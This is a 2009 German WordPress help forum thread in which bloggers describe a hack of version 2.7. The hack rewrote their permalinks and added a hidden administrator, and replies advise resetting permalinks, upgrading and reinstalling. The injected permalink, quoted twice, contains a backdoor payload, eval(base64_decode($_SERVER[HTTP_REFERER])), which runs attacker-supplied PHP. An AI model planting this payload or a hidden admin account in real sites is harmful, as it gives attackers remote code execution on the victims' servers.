Nichts ist aufrufbar

  • Internetseite: http://www.deutschland-debatte.de
    Traffic: ca. 2500/Tag
    WP 2.7

    Problem: die Seitenaufrufe funktionieren, die Artikel und Kommentaraufrufe haben eine falsche Befehlsstruktur/Permalink. Beispiel:

    Permalink: http://www.deutschland-debatte.de/2009/09/03/der…-sich-fort/%25&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/.

    Fehlermeldung:
    "Fehlerhafte Anfrage!

    Ihr Browser (oder Proxy) hat eine ungültige Anfrage gesendet, die vom Server nicht beantwortet werden kann.

    Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.
    Error 400
    http://www.deutschland-debatte.de
    Fri Sep 4 05:27:02 2009
    Apache/2.0.54 (Debian GNU/Linux) "

    Was läuft hier falsch?

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Hatte ich heute nacht auch, keine Ahnung wieso das umgestellt wurde.

    Aber die Lösung liegt unter:
    Einstellungen › Permalinks
    und dann z.B. wieder auf Standard setzen.

    Gruß,

    Dennis

  • Hatte ich heute nacht auch, keine Ahnung wieso das umgestellt wurde.

    Aber die Lösung liegt unter:
    Einstellungen › Permalinks
    und dann z.B. wieder auf Standard setzen.

    Gruß,

    Dennis

    Dennis, ich weiß nicht, wie ich dir danken kann!!!! Es war richtig.

    Aber die Frage ist für mich: ich war nicht daran - wer kann das über Nacht ändern?

    Wenn ich prüfe, wer Administrator ist, wird mir angezeigt Administrator (4), jedoch werden nur 3 Administratoren aufgelistet. Wie kriege ich den 4. raus?

    Wenn du das auch hattest, gibt es eine Möglichkeit, von "außen" den Schalter zu betätigen?

    Einmal editiert, zuletzt von BMB (4. September 2009 um 08:49)

  • Wie gesagt, hatte das gleiche Problem.

    Erstmal auf 2.8.3 upgrade gemacht, da es wohl einen Rechtefehler gibt, der es via Abonnentenrolle Änderungen durchzuführen. Da könnte evtl. die Lücke für den Hack liegen.

  • Wie gesagt, hatte das gleiche Problem.

    Erstmal auf 2.8.3 upgrade gemacht, da es wohl einen Rechtefehler gibt, der es via Abonnentenrolle Änderungen durchzuführen. Da könnte evtl. die Lücke für den Hack liegen.

    Dennis,
    ich hab Befürchtungen beim upgrade meiner Seite! Wie geht man am besten vor? Mein früherer Admin ist nicht mehr ....

    Ich hab gerade gesehen, dass in meiner config.php, wo lt. Anweisung stehen müsste:


    • Seit Version 2.6: Der SECRET_KEY (siehe Seit Version 2.5 oder 2.5.1) wurde durch drei Keys ersetzt. define('SECRET_KEY', 'XXXXXXXXXX'); muss also aus der wp-config.php entfernt werden - sofern vorhanden (da erst ab Version 2.5 unterstützt). Stattdessen muss folgender Code nach der Zeile define(’DB_COLLATE’, ”); eingefügt werden:


    define('AUTH_KEY', 'XXX');
    define('SECURE_AUTH_KEY', 'YYY');
    define('LOGGED_IN_KEY', 'ZZZ');


    die secret keys nicht aufgelistet sind. Kann das die Ursache sein?

    Einmal editiert, zuletzt von BMB (4. September 2009 um 09:31)

  • Bei mir hat sich auch der fehlerhafte Code eingeschlichen. Habs dann in den Permalinkeinstellungen in der Benutzerdefinierten Struktur rausgelöscht und nun funktioniert es wieder. Upgraden ist grade in Arbeit. ;)
    Danke für den Tipp!

  • Was ist die Ursache?????

    Bei mir hat sich auch der fehlerhafte Code eingeschlichen. Habs dann in den Permalinkeinstellungen in der Benutzerdefinierten Struktur rausgelöscht und nun funktioniert es wieder. Upgraden ist grade in Arbeit. ;)
    Danke für den Tipp!

    Ich habe meine Admins gefragt: keiner war im Ordner Permalink! Da muss doch jemand von außen das machen können!

  • Habe das gleiche Problem schon hier gepostet. Hier geht aber die Diskussion schön weiter. Mein Problem wäre jetzt das ich die Struktur nicht unbedingt ändern möchte. Wäre es wohl eine Lösung die Wordpress Version zu updaten?

    Und falls ja, erstmal Permalinks auf standart setzen, updaten und dann wieder auf Permalinks setzen? Oder einfach updaten ohne rücksicht auf Verluste?

    Habe Wordpress 2.7 noch.. vielleicht ist das das Problem.

  • Habe das gleiche Problem schon hier gepostet. Hier geht aber die Diskussion schön weiter. Mein Problem wäre jetzt das ich die Struktur nicht unbedingt ändern möchte. Wäre es wohl eine Lösung die Wordpress Version zu updaten?

    Und falls ja, erstmal Permalinks auf standart setzen, updaten und dann wieder auf Permalinks setzen? Oder einfach updaten ohne rücksicht auf Verluste?

    Habe Wordpress 2.7 noch.. vielleicht ist das das Problem.

    "Habe Wordpress 2.7 noch.. vielleicht ist das das Problem." danke für den Link; hatte danach gesucht und nicht gefunden.

    Auch ich hab noch 2.7 ! Und ohne Sicherheitsschlüssel ( war von meinem früheren Admin so installiert worden ).

  • Hab mich grad bei Mashable und Lorelle Mörder-erschrocken, weil die in Weltuntergang machen deswegen:

    Zitat


    All users are advised to upgrade to the latest version of WP, while those already affected are in for a trying weekend: you’ll likely need to export your all your content with the built-in XML WordPress export, uninstall and reinstall WordPress and re-import the content. It’s a nasty attack that goes all the way into the database, so exporting the database will result in exporting the hacked code too.



    Gott, hoffentlich geht der Kelch an mir vorüber, hab nicht die Zeit für son Scheiß... 284 ist also safe???

    NewsHQ - Die Welt und andere Newswürdigkeiten bloggerisch übers Knie gebrochen

  • Zitat

    If you’re running a self-hosted WordPress ([Blockierte Grafik: http://static1.blippr.com/images/inline-face_07.png?1251418262]) blog that isn’t up-to-date (version 2.8.4), you’re advised to upgrade immediately to the latest version of the software to avoid an ongoing attack. Users of WordPress.com hosted blogs are not affected.

    Für diejenigen, die auch nicht Zahlen lesen können:
    Wenn Sie ein selbst betriebenes Wordpress haben und nicht 2.8.4 betreiben, wird dringend geraten, unverzüglich auf die aktuelle Version zu updaten, um keinen Angriff zu riskieren. Blogger auf Wordpress.com sind nicht betroffen.

    Ich finde es unverantwortlich, wie hier von manchen auf Panik gemacht wird.




  • Ich finde es unverantwortlich, wie hier von manchen auf Panik gemacht wird.



    Naja, Lorelle und Mashable sind ja nun Quellen mit erheblichem Standing, die den Teufel da schon an die Wand malen. Und weil im WPD-Blog schon von 285 die Rede war, find ich es nur berechtigt, nachzufragen, ob die Community mehr weiß... Denn offenbar ist es eben nicht genug, upzugraden, wenn das Kind schon in den Brunnen gefallen ist. Und ich möcht nicht in meine Datenbank steigen müssen... Vorsicht ist besser als Nachtschicht ;-)

    NewsHQ - Die Welt und andere Newswürdigkeiten bloggerisch übers Knie gebrochen

  • Ich hatte das schon richtig vernommen mit 284, bin auch nicht betroffen, aber bei DB-Beteiligung - wie bei diesem Hack offenbar - gebranntes Kind und daher um Gewißheit aus dem stets gut informierten User/Mod-Kreis bemüht... schließlich ist 284 nun auch schon wieder was her, könnt ja sein, das da vor 285 noch was kommt oder vorgezogen wird, wenns denn so nen brennendes Prob ist, wie die US-Kollegen da schreiben...

    NewsHQ - Die Welt und andere Newswürdigkeiten bloggerisch übers Knie gebrochen

  • Für diejenigen, die auch nicht Zahlen lesen können:
    Wenn Sie ein selbst betriebenes Wordpress haben und nicht 2.8.4 betreiben, wird dringend geraten, unverzüglich auf die aktuelle Version zu updaten, um keinen Angriff zu riskieren. Blogger auf Wordpress.com sind nicht betroffen.

    Ich finde es unverantwortlich, wie hier von manchen auf Panik gemacht wird.


    Hallo,

    also, ich habe 2.7 noch am Laufen. Ich habe getest, was auf der Seite steht:

    "
    There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
    The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution."


    trifft absolut auf meinen Blog zu:
    a) der andere Permalink
    b) ein nicht sichtbarer Admin.


    BITTE: was muss ich nun tun. Ich komme in den Admin- Bereich, ich bin aber kein EDV- Fachmann! Gibt es irgendwelche Risiken für die Datenbank? Ich habe über 2500 Artikel auf meiner Seite!

    Einmal editiert, zuletzt von BMB (5. September 2009 um 19:22)

  • Der von NHQ zitierte Abschnitt sagt im Wesentlichen: die in Wordpress eingebaute Export-Funktion nutzen, um alle Beiträge zu sichern, Wordpress deinstallieren und neu einrichten mit der Version 2.8.4 (also auch insbesondere Plugins und Theme) und danach die Inhalte wieder importieren. Die Dokumentation liefert Dir weitere Hilfen. Zu beachten ist, dass die von Dir vorgenommenen Änderungen an Wordpress-Core Dateien dabei verloren gehen, somit erneut vorgenommen werden müssen. Ebenfalls ratsam ist es, seinen Plugin und Theme Ordner zu sichern und nach dem Update wieder zurückzuspielen.

    Es ist keine Kleinigkeit, ich rate Dir dazu, dies von einem Fachmann, der mit Deiner Installation vertraut ist, machen zu lassen.

    LG Domi

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!